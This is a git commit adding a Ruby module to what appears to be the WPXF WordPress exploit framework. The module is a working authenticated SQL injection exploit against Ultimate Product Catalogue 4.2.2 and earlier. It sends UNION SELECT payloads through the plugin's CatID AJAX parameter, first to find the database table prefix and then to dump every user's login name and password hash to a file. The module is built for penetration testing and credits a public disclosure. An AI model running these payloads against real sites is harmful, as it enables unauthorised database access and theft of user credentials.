Add Ultimate Product Catalogue <= 4.2.2 hash dump

rastating · rastating · commit 1a8958e154fa · 2017-08-13T22:31:19.000+01:00
diff --git a/modules/auxiliary/ultimate_product_catalogue_hash_dump.rb b/modules/auxiliary/ultimate_product_catalogue_hash_dump.rb
@@ -0,0 +1,124 @@
+class Wpxf::Auxiliary::UltimateProductCatalogueHashDump < Wpxf::Module
+  include Wpxf
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Ultimate Product Catalogue <= 4.2.2 Authenticated Hash Dump',
+      desc: %(
+        Ultimate Product Catalogue <= 4.2.2 contains an SQL injection vulnerability
+        which can be leveraged by all users with at least subscriber status. This
+        module utilises this vulnerability to dump the hashed passwords of all
+        users in the database.
+      ),
+      author: [
+        'Lenon Leite',                     # Disclosure
+        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8853'],
+        ['URL', 'http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/']
+      ],
+      date: 'Jun 26 2017'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'export_path',
+        desc: 'The file to save the hash dump to',
+        required: false
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('ultimate-product-catalogue', '4.2.3')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def export_path
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
+  end
+
+  def execute_sqli(payload)
+    res = execute_post_request(
+      url: wordpress_url_admin_ajax,
+      cookie: session_cookie,
+      params: {
+        'action' => 'get_upcp_subcategories'
+      },
+      body: {
+        'CatID' => payload
+      }
+    )
+
+    return res.body if res && res.code == 200
+
+    if res
+      emit_error "Injection failed - request returned code #{res.code}"
+      return nil
+    end
+
+    emit_error 'Injection failed'
+    nil
+  end
+
+  def determine_prefix
+    eol_token = Utility::Text.rand_numeric(10)
+    payload = "0 union select table_name, #{eol_token} FROM information_schema.tables where table_schema = database()"
+
+    res = execute_sqli(payload)
+    return nil unless res
+
+    res[/,([^,]+?)usermeta,#{eol_token}/, 1]
+  end
+
+  def dump_and_parse_hashes(prefix)
+    eol_token = Utility::Text.rand_numeric(10)
+    payload = "0 UNION SELECT concat(user_login,0x3a,user_pass),#{eol_token} FROM #{prefix}users"
+
+    output = execute_sqli(payload)
+    pattern = /(.+?)\:(.+?),#{eol_token}[,0]?/
+    output.scan(pattern)
+  end
+
+  def output_as_table(creds)
+    rows = []
+    rows.push(user: 'Username', hash: 'Hash')
+    creds.each do |pair|
+      rows.push(user: pair[0], hash: pair[1])
+    end
+
+    emit_table rows
+  end
+
+  def export_creds(creds)
+    open(export_path, 'w') do |f|
+      creds.each do |pair|
+        f.puts "#{pair[0]}:#{pair[1]}"
+      end
+    end
+
+    emit_success "Saved dump to #{export_path}"
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Determining database prefix...'
+    prefix = determine_prefix
+    return false unless prefix
+    emit_success "Found prefix: #{prefix}", true
+
+    creds = dump_and_parse_hashes(prefix)
+    output_as_table creds
+
+    export_creds(creds) if export_path
+    true
+  end
+end
